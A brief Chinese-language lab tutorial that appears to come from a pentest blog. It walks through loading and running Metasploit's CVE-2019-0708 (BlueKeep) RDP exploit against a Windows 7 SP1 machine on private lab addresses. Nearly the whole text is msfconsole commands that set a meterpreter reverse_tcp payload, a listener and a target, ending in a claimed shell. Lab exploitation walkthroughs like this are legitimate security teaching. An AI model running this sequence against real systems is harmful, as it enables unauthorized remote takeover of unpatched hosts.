把CVE-2019-0708的攻擊套件添加到metasploit中
添加教程
攻擊主機:192.168.10.128 目標主機:192.168.10.131 (win7 SP1)
打開msf,輸入reload_all命令
msf5 > reload_all //加載腳本
msf5 > search cve-2019-0708 //搜索cve-2019-0708
#使用腳本
msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
#設置監聽反彈payload
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set payload windows/x64/meterpreter/reverse_tcp
#設置監聽地址
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set lhost 192.168.10.128
#設置監聽端口
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set lport 4444
#設置目標ip
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rdp_client_ip 192.168.10.131
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 192.168.10.131
#取消默認設置的名稱
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > unset RDP_CLIENT_NAME
#設置目標類型,提高成功率
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 3
#查看攻擊腳本要設置的參數
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options
#開啓攻擊
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
成功獲取到shell